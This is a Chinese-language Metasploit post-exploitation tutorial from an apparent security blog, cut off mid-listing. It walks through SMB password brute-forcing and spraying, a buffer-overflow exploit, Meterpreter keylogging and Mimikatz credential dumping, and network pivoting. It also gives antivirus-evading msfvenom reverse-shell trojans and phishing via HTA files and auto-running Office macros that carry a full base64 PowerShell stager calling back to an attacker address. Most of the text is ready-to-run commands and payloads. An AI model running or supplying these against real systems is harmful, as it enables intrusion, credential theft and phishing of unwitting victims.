Metasploit后渗透利用

ivi

Metasploit后渗透利用

特mac0x01 Web安全工具库 2023-05-05 08:01 发表于河南

Metasploit 是一款开源的渗透测试工具，可以帮助网络安全专家和黑客发现和利用计算机系统当中的漏洞。在 Metasploit 中包含大量漏洞利用模块，可用来测试目标系统的安全性并快速创建和执行攻击。目前 MSF 框架可用于多种目的，包括渗透测试、漏洞研究、安全评估、恶意软件分析、网络防御等。同时还拥有强大的自动化功能，能够自动化执行一系列攻击，提供了图形化和命令行两种操作界面。

0x01 下载安装

APT安装

默认情况 Kali Linux 中已经安装了 Metasploit，如果不慎卸载可使用 APT 包进行安装

1. apt install metasploit-framework

复制代码

源码安装

在其他 Linux 下可使用源码安装

1. curl
   
2. https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb
   
3. > msfinstall && \chmod 755 msfinstall && \./msfinstall

复制代码

安装数据库并配置自动启动

1. sudo apt install postgresql
   
2. 
   
3. sudo systemctl start postgresql
   
4. 
   
5. sudo systemctl enable postgresql

复制代码

初始化数据库

1. sudo msfdb init

复制代码

成功启动 MSF

1. msfconsole

复制代码

0x02 基础使用

用户界面

启动数据库可保存相关信息

1. sudo systemctl start postgresql
   
2. 
   
3. sudo systemctl enable postgresql

复制代码

升级 MSF 版本

1. sudo apt update;sudo apt install
   
2. metasploit-framework

复制代码

静默启动 MSF 并查看帮助

1. sudo msfconsole -q

复制代码

基本语法

MSF中共包含几千个模块，它们被划分成不同类型，包括encoders、exploits、payloads等

1. show -h

复制代码

查找端口扫描相关模块，找到后选择对应数字使用即可

1. search portscan

复制代码

使用新模块后可回退至上一个模块

1. use auxiliary/scanner/portscan/syn
   
2. 
   
3. previous

复制代码

退出当前模块

1. back

复制代码

当然在大部分模块中需设置参数

1. show options

复制代码

使用set、unset、setg、unsetg进行设置模块，只是全局和局部的区别

1. set rhosts 192.168.0.1
   
2. 
   
3. set ports 80-89

复制代码

使用run或exploit运行模块

1. run

复制代码

在启用数据库情况下相关服务信息已存储

1. services
   
2. #使用 -S 筛选服务名称，使用 -p 筛选端口号
   
3. service -p 80

复制代码

如果在启动数据库的情况下还可以使用Nmap 扫描

1. db_nmap 192.168.0.1 -p 80 -sV

复制代码

列出已经发现的主机

1. hosts

复制代码

不同的渗透项目中可存储于不同的工作组当中

1. workspace #列出工作组
   
2. -a #添加工作组
   
3. -d #删除工作组

复制代码

0x03 常见模块

辅助模块

辅助模块主要用于信息收集、协议枚举、端口扫描、模糊测试、网络嗅探等。列出所有辅助模块

1. show auxiliary

复制代码

搜索 SMB 服务名称相关的辅助模块

1. search type:auxiliary name:smb

复制代码

选择 SMB 版本扫描模块并查看相关信息

1. use auxiliary/scanner/smb/smb_version
   
2. 
   
3. info

复制代码

如果数据库开启可搜索已开启445端口的主机

1. services -p 445 --rhosts

复制代码

扫描 SMB 服务并爆破密码

1. use auxiliary/scanner/smb/smb_login
   
2. 
   
3. set SMBUser administrator
   
4. 
   
5. set SMBPass mac
   
6. 
   
7. set rhosts 172.16.117.174
   
8. 
   
9. set threads 10
   
10. 
    
11. run

复制代码

如果数据库开启可查看捕获到的凭证

1. creds

复制代码

基于已知密码配合用户名字典进行喷射

1. set rhosts 172.16.117.138-174
   
2. 
   
3. set USER_FILE /user.txt
   
4. 
   
5. set SMBPass mac
   
6. 
   
7. run

复制代码

扫描 RDP 服务

1. use auxiliary/scanner/rdp/rdp_scanner
   
2. 
   
3. set rhosts 172.16.117.174
   
4. 
   
5. run

复制代码

利用模块

漏洞利用模块共包含1700多个EXP，搜索syncbreeze 已知漏洞

1. search syncbreeze

复制代码

使用利用模块并查看相关信息

1. use exploit/windows/http/syncbreeze_bof
   
2. 
   
3. info exploit/windows/http/syncbreeze_bof

复制代码

查看当前 EXP 支持的 payload

1. show payloads

复制代码

设置目标 payload 和对应版本

1. set payload windows/shell_reverse_tcp
   
2. 
   
3. show targets
   
4. 
   
5. set target 2

复制代码

设置反弹shell地址

1. set lhost 172.16.117.1
   
2. 
   
3. set rhost 172.16.117.205

复制代码

检测主机是否存在漏洞

1. check

复制代码

执行漏洞利用模块

1. exploit

复制代码

Payload模块

除了基础的 payload 以外，MSF 中还包含多种高级 payload，它们主要分为两种：

• Non-Staged：不分阶段 Payload，与 EXP 一起被完整发送到目标系统
• Staged：分阶段 Payload，通常被分为两部分
  
  
  
  
  • 第一部分较小，负责建立反弹连接，传输较大的第二部分 payload 并执行
  • 为了避免被杀软发现，第一部分不包含明显特征的恶意代码，利用其加载第二阶段代码到内存中并执行
    

根据 payload 的名称可以区分 payload，比如同样是反弹shell，分阶段的是shell/reverse_tcp，不分阶段就是shell_reverse_tcp

Meterpreter

Meterpreter 使用可动态扩展的多功能 Payload，提供更多的功能和函数，比如传文件、键盘记录、音/视频的开启等。同时还支持多系统、多架构、多语言、多协议

1. search type:payload name:meterpreter
   
2. 
   
3. set payload windows/meterpreter/reverse_http

复制代码

其他 payload

1. vncinject/reverse_http #反弹VNC图形shell
   
2. php/reverse_php #PHP反弹shell，用于WEB攻击

复制代码

查询基础信息，输入help可查看帮助信息

1. sysinfo #查看系统信息
   
2. getuid #查看用户信息

复制代码

在 Meterpreter 支持简单的 Linux 命令，即使 Windows 也适用

1. pwd
   
2. ls
   
3. cd
   
4. execute
   
5. ps
   
6. kill

复制代码

自带文件上传、下载功能，但 Windows 下路径必须指定双斜杠

1. upload
   
2. /usr/share/windows-resources/binaries/nc.exe c:\\Users\\offsec
   
3. download c:\\windows\\system32\\calc.exe /tmp/calc.exe

复制代码

获取屏幕截图

1. screenshot

复制代码

进程迁移至需要键盘记录的用户

1. ps
   
2. migrate 2796

复制代码

获取键盘记录

1. keyscan_start
   
2. keyscan_stop

复制代码

Meterpreter 会话依赖对应进程，如果进程结束会话也将随之结束。拿到会话第一时间需要迁移进程

1. ps
   
2. migrate 2678

复制代码

Mimikatz 扩展需要 SYSTEM 权限

1. load kiwi
   
2. getsystem
   
3. creds_all #获取密码哈希

复制代码

以 MSF 作为跳板穿透内网，添加内网路由

1. route add 10.10.10.1
   
2. 
   
3. route print

复制代码

通过跳板访问内网域控DC

1. use exploit/windows/smb/psexec
   
2. 
   
3. set SMBDomain corp
   
4. 
   
5. set SMBUser admin
   
6. 
   
7. set SMBPass admin
   
8. 
   
9. set rhosts 10.10.10.110
   
10. 
    
11. set lport 4444
    
12. 
    
13. set payload windows/meterpreter/bind_tcp
    
14. 
    
15. exploit

复制代码

除了添加内网路由外，还可以使用 autoroute 模块，利用已建立的 Meterpreter 穿透内网

1. use multi/manage/autoroute
   
2. 
   
3. sessions -l
   
4. 
   
5. set session 4
   
6. 
   
7. exploit

复制代码

结合路由和 socks4a 模块建立 socks 代理，允许外部工具直接访问内网

1. use auxiliary/server/socks4a
   
2. 
   
3. set SRVHOST 127.0.0.1
   
4. 
   
5. exploit -j

复制代码

配置 proxychains 挂代理访问内网

1. sudo proxychains rdesktop 192.168.1.110

复制代码

当然也可以通过 Meterpreter 会话实现端口转发

1. portfwd -h
   
2. 
   
3. portfwd add -l 3389 -p 3389 -r 192.168.1.110

复制代码

在本地连接远程桌面

1. rdesktop 127.0.0.1

复制代码

木马生成

可执行的 payload 能以不同文件格式导出，比如 ASP、VBScript、Jar、War、DLL、EXE 等，比如生成 PE 类型的反弹shell

1. msfvenom -p windows/shell_reverse_tcp
   
2. lhost=172.16.117.1 lport=443 -f exe -o shell_reverse.exe

复制代码

编码 shellcode 用于免杀AV

1. msfvenom -p windows/shell_reverse_tcp
   
2. lhost=172.16.117.1 lport=443 -f exe -e x86/shikata_ga_nai -i 4 -x
   
3. /usr/share/windows-resources/binaries/plink.exe -o embedded.exe

复制代码

当然也可以在 MSF 界面中生成木马，效果和第一种一样

1. use payload/windows/shell_reverse_tcp
   
2. set lhost 172.16.117.1
   
3. set lport 443
   
4. generate -f exe -e x86/shikata_ga_nai -i 9 -x plink.exe -o embedded.exe

复制代码

启动 MSF 侦听

1. use multi/handler
   
2. set payload windows/shell_reverse_tcp
   
3. set lhost 172.16.117.1
   
4. set lport 443
   
5. exploit -j

复制代码

执行木马成功上线

1. sessions -i

复制代码

执行免杀木马成功上线

查看后台监听

1. jobs
   
2. jobs -i 2 #显示 job 2 信息

复制代码

结束后台监听

1. kill 2 #结束 job 2

复制代码

使用 transport 转换监听

1. transport list
   
2. transport add -t reverse_https -l 192.168.0.1 -p 5555
   
3. transport next

复制代码

0x04 网络钓鱼

生成客户端可执行格式的文件，比如 HTA、Office 宏等，查看支持的所有格式

1. msfvenom -l formats

复制代码

Flash钓鱼

使用客户端浏览器攻击向量，其中 Flash 主要针对老旧版本客户端

1. search flash

复制代码

查看模块的高级选项

1. use exploit/multi/browser/adobe_flash_hacking_team_uaf
   
2. show advanced

复制代码

编码第一、二阶段 shellcode

1. set EnableStageEncoding true
   
2. set StageEncoder x86/shikata_ga_nai
   
3. exploit -j

复制代码

目标访问点击 Flash 更新成功上线

HTA钓鱼

如果把 HTML 扩展名修改为.hta，IE 浏览器会将其作为 HTML 应用程序解析执行。如果在浏览器之外，可使用 mshta.exe 来执行该程序。HTA 兼容 ActiveX 等遗留技术，支持 JavaScript、VBScript，可执行任意程序，但该攻击方式只对 IE、Edge 有效。首先在 MSF 中生成用于攻击的 HTA 文件

1. msfvenom -p windows/x64/shell_reverse_tcp
   
2. lhost=10.10.10.148 lport=4444 -f hta-psh -o mac.hta

复制代码

在本地 MSF 中开启监听

1. msf > use exploit/multi/handler
   
2. msf > set payload windows/x64/shell_reverse_tcp
   
3. msf > set lhost 10.10.10.148
   
4. msf > set lport 4444
   
5. msf > exploit -j

复制代码

在 Windows 主机中打开 HTA

成功上线 MSF

当然也可以使用 mshta 打开程序

1. mstha http://172.16.117.1/mac.hta

复制代码

查看 HTA 程序源码可知：HTA 脚本语言为 VBScript，通过 Windows 脚本引擎的 Run 方法执行 PowerShell

1. <script language="VBScript">
   
2. 
   
3.   window.moveTo -4000, -4000
   
4. 
   
5.   Set g9sC2u7hP5K =
   
6. CreateObject("Wscript.Shell")
   
7. 
   
8.   Set yPI4TszOgKUl =
   
9. CreateObject("Scripting.FileSystemObject")
   
10. 
    
11.   For each path in
    
12. Split(g9sC2u7hP5K.ExpandEnvironmentStrings("%PSModulePath%"),";")
    
13. 
    
14.     If yPI4TszOgKUl.FileExists(path +
    
15. "\..\powershell.exe") Then
    
16. 
    
17.       g9sC2u7hP5K.Run
    
18. "powershell.exe -nop -w hidden -e
    
19. aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoACgAJwAnAEgANABzAEkAQQBQADUANABqADIATQBDAEEANwBWAFcAYgBXAC8AYQBTAEIARAArAFgAcQBuAC8AdwBhAHEAUQBzAEgAVwBFAGwAeQBSAE4AYQBhAFIASQB0AHcAWQA3AG0ARQBLAEMAWQB6AEEATgAnACcAKwAnACcASABLAHEATQB2AGQAaQBiAEwARgA1AGkAcgB3AEcAbgAxAC8AOQArAHMAMwA3AEoAaQA1AEwAMABlAGkAZAAxAEoAWQBSADMAZAAyAFoAMgA5AHAAbABuAFoAbgBhAFYAaABDADQAbgBMAEoAVABJADYARQBUADYALwB2ADYAZABWAEkAeQBSAEUAegBsAHIAUwBhADcAYwB1AEkAWgBiAGsAeQBxAEIAcgB6AHoAdQBWAGUASgB2AHEAWABRAG0AeQBYAE8AMAAnACcAKwAnACcAMgBYAFQAWgAyAGkASABoADQAdgBTADAAawAwAFEAUgBEAG4AawArAHIANQA5AGoAagB1AEkAWQByADUAZQBVADQARgBoAFcAcABMACsAbABhAFkAQQBqAHsAMQB9AEgAQwA1AHYATQBFAHUAbAA3ADUATABsAFcALwAxAGMAOABxAFcARABpADMARQAwAG8ANwBqAEIAbABnADYAUQBLAEUAbgA5AGcAYgBNAGQAWQBSAGIAZABXAHQARABDAFoAZQByAHsAMQB9AC8AMQBWAFYAZQBZAEgAcgBVAFYAZAB1ADAAcwBjAEcAcwB0AFYASwA0ADAANQBYAHQAYwA5AFMAcQB1AEsAOQBFAE0AUgBCADQANwBUAEQAWgBhAHIAUQArAEoARwBMAEcAWQByAFgAcAArAFMAOABPAGkAdwBQAGcAbABqAFoANABVAHYAdwBOAG8AVwBEAHoARQBQAG0AQgBkAFgANABTADYAUAB0ADQAawB3AFQANgBJAHcAdQA1AFMAdwBrAHMAdgBJAFYAewAxAH0AZwBjAFIAYwB4AEYAbgBoAHsAMQB9AGgATwBLADcAVwBwAEwAbQB3AFAAMQA4AHMALwBwAFQAbgB4AGUARgBYACcAJwArACcAJwBTAGMAagBKAEcAdABlAE4AawBPAE8ASQBiAFMAdwBjAGIAWQBtAEwANAAzAHIAUABDAFQAMgBLAHIALwBCAHEAQQBWAG8AVwBqADAAagBvAEwAeABRAEYAeABMAGIAcwBGAHMAdQAnACcAKwAnACcAVgBNAEsARwAwAEoAdgAwAFgATQAnACcAKwAnACcALwBJAEYAMwBwAFgAUQAvAGEAcQBTAC8ARgBRAEoAcABFAFkAOABVAG0AbwBRADAASgB7ADEAfQBYAEgARABJAHYAbwBUAGgAWAByAEwANwBpAFoAOABZAEIAQgBVAGIATwBBAHcARAB2AGgAOABCAHYAVgBUAEkAbgBuAGsAeQBiAFIANgA5AHcANQAzAEcAaABIAFAATgBzAEIANABQAEgAOABvAGoARgBKAE4ATQArAGsANQBvADEAYQBRAGkASABPADUAeABGAGcAbABhAFYAYwBaAFIAZwBaAHsAMQB9AEcAJwAnACsAJwAnAEEAdAAxAFMASgAwAEwAVwBSADEASAA3AFYAWABLAHYAVQBCAFUAMgAzADEAWQBhAFYAdQBjADIASQB0ADMAagBVAHsAMQB9AHgAYgArAEMAcgBlAEUAeQBOAHQAVQA3AHUASQBWAEMAWABFADMARABaADAAMQBjAFUAdQAyAHkAcQArAEYAQgBLADgAbwB6AGkAQwBwAGwAMgBJAFgANABKADUAYwBMAFQAYQB3ADEAOABVAFUAKwB3ADQAWABLAEEAdABtAHYARgBEAFQAMQBvAFEALwA2AEsAbwBKAG8AUgA2AE8AawBBAHQAaABqAGMARQByAGkATABqAHkAMwBKAGsAOABjAEgATABWAEMASQBkADQARABlAEQAbABjADYAQgBxAFoAUQBVADUAZwBrAHYAcABJAGkALwBTADgAbgBRAHgAQgA2AEYAcQBoAHoAcAB4AFgASgBOAEcAQwBTAFEAcAA1AEwAJwAnACsAJwAnAGkARgBIAFkAcQA5AG0AbwBUAEMAbQBCAFIAYgBLAE8ARQBzACsANgB3ACsAdQBqAHQATQBLAEMAZQB1AEUALwBQAFMAMwBFAEoANQBCAG0AWgB4AGEASQBlAEYATQBZADgAUwBGACcAJwArACcAJwA0AEkASwBBAEkAeQB0AEQAWABhAEoAUQB3AFUAZQBOAGEAbABIAFAASwB5AG0ARgB2AEgATAB3ADYAdQB2AG8AdABGAHgASwBJAFgAVQBBAFUAdABiAGkAQQBhAHMAQwBCAFEAcwBMAHEAZwBTAGcAWgA4ADUATAAnACcAKwAnACcAWgBTADYAaABiAG0AeAAzAGwAQwA4AEIAcQBHAHMAWgAnACcAKwAnACcAdQBqAFUAOABhAEYAQwBGAEIAbQBTAGsAYwB2AHgAcwBWAGQAOQAxAGMAOAB5AEQAMwBMAFMAQwAxAGgASwBQAEoANQA0AEMAYgBHADIASwBPAE0AMQB5AFMAWQBSAGgALwBvAGoASQBBAFoAcQAvAFQAOAB7ADEAfQBYAGwAWQBlAGMASwBZAFQANABTAEkAeQBjAHAAbAB7ADEAfQBjAHoAWABsAGcAdgArAFYAMgB6AEYAcgBuAHcAaQBPAEYAaABCAGwAZwBFACcAJwArACcAJwBRAGMAdwBOAEEAagB0AGwAYQBkAEcASgA4AGMANQAxAFYARwAvAHQARABRAFMAUAB7ADEAfQBqAHEATQB0ADIAQwBJAGEAbQBYADUAbQAyAGEAawAzAHMAbQBUAEgAMAArAHQAUQB5AHUASABXAHQAawBjAEUAawBDAEEAegBTAE0AbgB5AFkAcAB4AFAATgBIAC8ASABtADUAcwB0ADQAMwBPAHQAYgAzAFIANgBLAHUAdgB0AGcAaABZAHoAWQAwAEgAcABxAGEAcgAnACcAKwAnACcAWgBVADUAUABiAEkASgA3AHUAdgBUAGkAJwAnACsAJwAnAGEAZwBSAHoAbwBEADgAMgBaAHYASQBLADgAegA4AEEAMAB7ADEAfQBEAGwAQwBOAHcARgBXAGIAcwA2AGEAdgBOAHYAWABPAHcARgBJAEQAagBUAFMAUgBiADUAawA5ADgANwBnADEATQB4AHAAdABxAHAASgA3AHkANwBCAFEAYgAvAHAAZwAvADgARwB1AGQAbgB6AGMAKwA3AG8AewAxAH0AbwA0AHQAaABIAHcAWAA2AHAAYQBlADMARAB2ACcAJwArACcAJwBWAE0ALwAxAGIAbwB6ADIANwBQAEIAMQAwAHQAbQA3AHQAaQBiAGwANwBIAEcAdABIAGcASABFADIALwBOAHUAMABBAFQAKwAyAE4ATwB0AFgAMABtAFcAbAB2AEQAUAArAFAAbgBXAC8AYQBnADgAYQB4AEgAcQBpAHcAYgBwAEQAOQBZAEcATQAzAFkATABSAGEALwBXADMAbwAzAFEAOQBwACsAMwA0AEkANwBwAHIAMgByAEUALwB3AHoAUABCAHgANgBpAE0AVABJAGUAcwA2AHAATgBaAHkAMQAwAEcAcQA3AG4AWgA4ADkAbwBWAHEAKwBnAFQAVwBiAHMAZABHAHUARABlAFgAbQA2AEcAWABYAHYAYwBhAG4AKwAwAGgAdwBSAHUARwBUAEEAMABoAG4AVQBKAE8AcgBwAEcAegA2AHoAWgBhAHQAbQBxAEsATwA4AEUAUABXAGEATQBHAHMAbwB5AHcAVQAvAHkAcgA1AGoASwA2ADYAMwA1AHUAKwBLAEIAcgBFAE4AZQA3ADAAOABCAG4AcwBFAGwAZwA3ADYATwA1AHYASgB0AHQAdgBsADQARgBZAHMAOQAzAHIAeABBAEMAdgA2AHgAbABjAEwATwBjAG0AZwBqAGwATQBUAE0AaABaAGcAYgBCAC8AYQA5ADIAeQA3AHMAWQB1AHUAcABkADEANgBiAHEANQBIAEwAUQBuAHMAVwBlADEAdABkAE4ARgBVADMASQB4AFYAWABIAHYATgA3ADcASwBnAE8AYgBhADkAaABXAEoANwBsAGUAdgA5AEUAVwAzADIARQBqADEAUQA3ADcAdQAwAGsASwB2AC8ATQBUADcATwA0AGEAdwBiAFoAJwAnACsAJwAnAGgAQQAvADQAVwArAFAAaQBGADcARAA2AHEAaQBVADkANgB2AFMAbgBjAFkANwBuAGQAYwBhAGMALwBCAGIALwBXAGQASABuAG8AWgBYADYAMQBUAFQAWgBDAHMAMwBhAEgAZABUADgAZAA5AHkAWgA2ADAAbgBUAEgANwB2AHIAegBuAGIAZwAvADgAYQBKAEcAeQB6AHcANwArAHcAQQBzAG4AVQA5AEkAeQBJADgATwBGAHgAVQArAFYARQBVAFoAewAxAH0ALwArAHUAawB0ADUAewAxAH0AewAxAH0AbgB2AEMAMQBMAGUAYQAxAE4AQwBKADQAcwBDAGgAdwBHAEIAbwBQADIAVQBkADAAVgBtAGsARgB5ADEAbAB4AEkAagBRAGsARwBYAHgASwBMACcAJwArACcAJwBuAEYAVQBZAGcAcABkAEgATABvADkAVwBVAEMASQBrAHEAWgBLADkAcABaADMAbgB1AGcAbAArAFkAZABUAGoAVABjAGkAWgBGADUAOQBkAHEAWABJAGoAMABJAEsAbwArAE4AcgBsAHcANgBQAFoAMgBCAGwANQBEACcAJwArACcAJwBVAFcAYwBMAFYAQgB6AGoAMABlAFYAQgByADcAbwArAGEAVABXAGgAUgB6AFgAMwB6AE8ATQB2AGUAWAA3ADkAYwBoADIAMQBTAE8AYgBkAFcARQAxADAAdQBnACsAewAxAH0AJwAnACsAJwAnAEIAUABzADMAcwBnADAAbQB5AGsAbQBUADUAdAAwAE0ARwBqAHgAawBPAGgAewAxAH0AVQBuAG8ATAAyAEYASAA1ACcAJwArACcAJwB4ADkAQwA1AFUAUQBLAG4ATgBlAG4AdwBTAEsASwBtAFAAMABLAFkAYgBGADEAUgA0AG8AOABRAHgAQwB3AEsANABGADEANQArAEwAcAA0AHcAZwBDADEAZwA0AHcASABkAFEAOQAwAFMAagB7ADEAfQAvAHAAdwBxAE4AeQBjADMAMgB4AC8ASwAzACsASwBPAGgAdgBBAG4ALwBlAHYALwBIAGwAYwArADgAbgB1AEwAMwBHACcAJwArACcAJwBxAFcAYwBzAEIAZQByAEgAOAB7ADEAfQBPAEYASgBoAC8AcAA5AEUARQB3AGQAdwBrAEgAUQBnAG4ANQBCAGMAewAxAH0ANgBDAGUAUQBPAEoASQBtAG0AZQBSAEYAbgBFAEIAegBKAGkAVgBRAHoAeAByAHIAOQBNACsATQBFAEYAdgBCAFMAegByAHYAVQBQAFcAQgBEAEwAbwBVADQATQBBAEEAQQB7ADAAfQAnACcAKQAtAGYAJwAnAD0AJwAnACwAJwAnAGYAJwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=",0
    
20. 
    
21.       Exit For
    
22. 
    
23.     End If
    
24. 
    
25.   Next
    
26. 
    
27.   window.close()
    
28. 
    
29. </script>

复制代码

针对 PowerShell 中的参数解释如下：

• -nop（-NoProfile）：指示 PowerShell 不要加载用户配置文件（默认配置影响代码执行，因此禁用）
• -w hidden（-WindowStyle hidden）：禁止在用户桌面打开新窗口
• -e （-EncodedCommand）：Base64编码的 Powershell 脚本
  

而其中的乱码经 CyberChef 解码后如下，其执行的仍旧是 Powershell 脚本

Office宏钓鱼

利用客户端日常使用的受信软件存在的漏洞，攻击将更加隐蔽且成功概率更高。客户端常用软件通常存在 Office，主要用于处理日常的办公需求，在 Office 存在可利用的宏，通过宏代码可执行 VBA 代码，VBA 是全功能的脚本语言，支持 ActiveX、Windows 脚本。尝试在 Windows 中创建 Word 文档，在视图中添加宏MyMacro

在其中添加宏代码如下：

1. Sub AutoOpen()
   
2. 
   
3. MyMacro
   
4. 
   
5. End Sub
   
6. 
   
7. Sub Document_Open()
   
8. 
   
9. MyMacro
   
10. 
    
11. End Sub
    
12. 
    
13. 
    
14. 
    
15. Sub MyMacro()
    
16. 
    
17. CreateObject("Wscript.Shell").Run "cmd"
    
18. 
    
19. End Sub

复制代码

保存为 doc 文件

再次打开允许宏代码执行会弹出 CMD 命令行

在 MSF 中生成反弹shell代码

1. msfvenom -p windows/shell_reverse_tcp
   
2. lhost=10.211.55.5 lport=4444 -f hta-psh -o evil.hta

复制代码

由于 VBA 字符串存在长度限制，最大长度为255个字符，但字符串变量的长度没有限制，因此可先将 payload 分割成多段较短的字符串后再进行拼接执行，通过以下 Python 脚本进行分割

1. str = "powershell.exe -nop -w hidden -e
   
2. JABzACAAPQAgAE4AZQB3AC....."
   
3. 
   
4. n = 50
   
5. 
   
6. for i in range(0, len(str), n):
   
7. 
   
8.     print("Str = Str + " +
   
9. '"' + str[i:i+n] + '"')

复制代码

生成后的代码如下：

1. Sub AutoOpen()
   
2. 
   
3. MyMacro
   
4. 
   
5. End Sub
   
6. 
   
7. Sub Document_Open()
   
8. 
   
9. MyMacro
   
10. 
    
11. End Sub
    
12. 
    
13. 
    
14. 
    
15. Sub MyMacro()
    
16. 
    
17. Dim Str As String
    
18. 
    
19. Str = Str + "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad"
    
20. 
    
21. Str = Str + "ABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewA"
    
22. 
    
23. Str = Str + "kAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnA"
    
24. 
    
25. Str = Str + "H0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGk"
    
26. 
    
27. Str = Str + "AcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8Ad"
    
28. 
    
29. Str = Str + "wBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcAB"
    
30. 
    
31. Str = Str + "vAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9A"
    
32. 
    
33. Str = Str + "E4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQ"
    
34. 
    
35. Str = Str + "AaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAU"
    
36. 
    
37. Str = Str + "wB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQB"
    
38. 
    
39. Str = Str + "tAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9A"
    
40. 
    
41. Str = Str + "CcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACA"
    
42. 
    
43. Str = Str + "AJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAc"
    
44. 
    
45. Str = Str + "gBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB"
    
46. 
    
47. Str = Str + "5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkA"
    
48. 
    
49. Str = Str + "GUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGU"
    
50. 
    
51. Str = Str + "AbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAe"
    
52. 
    
53. Str = Str + "gBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQB"
    
54. 
    
55. Str = Str + "jAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5A"
    
56. 
    
57. Str = Str + "FMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4"
    
58. 
    
59. Str = Str + "AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAd"
    
60. 
    
61. Str = Str + "AByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARAArAHsAMgB"
    
62. 
    
63. Str = Str + "9AGsARwBNAEMAQQA3AFYAVwBiAFcALwBpAE8AQgBEACsAdgB0A"
    
64. 
    
65. Str = Str + "EwAKwBoADIAaQBGAGwARQBTAGkAdgBKAFYAdAB0ADUAVgBXAHU"
    
66. 
    
67. Str = Str + "AbwBTAFgARQBrAG8AbwBrAEIASQBLAEwARABxAFoAeABBAGsAd"
    
68. 
    
69. Str = Str + "QBUAGsAdwB7ADEAfQBwADcAewAyAH0AcwA3AFgAKwAvAEMAUwB"
    
70. 
    
71. Str = Str + "TAGwAVgB7ADEAfQB1ADcAMwBrAGwAcgBDAFIASABiAE0AKwBQA"
    
72. 
    
73. Str = Str + "HgATQA4AC8ATQAyAEkAdABEAFIAeABBAFcAUwB1AGgAcwBLAC8"
    
74. 
    
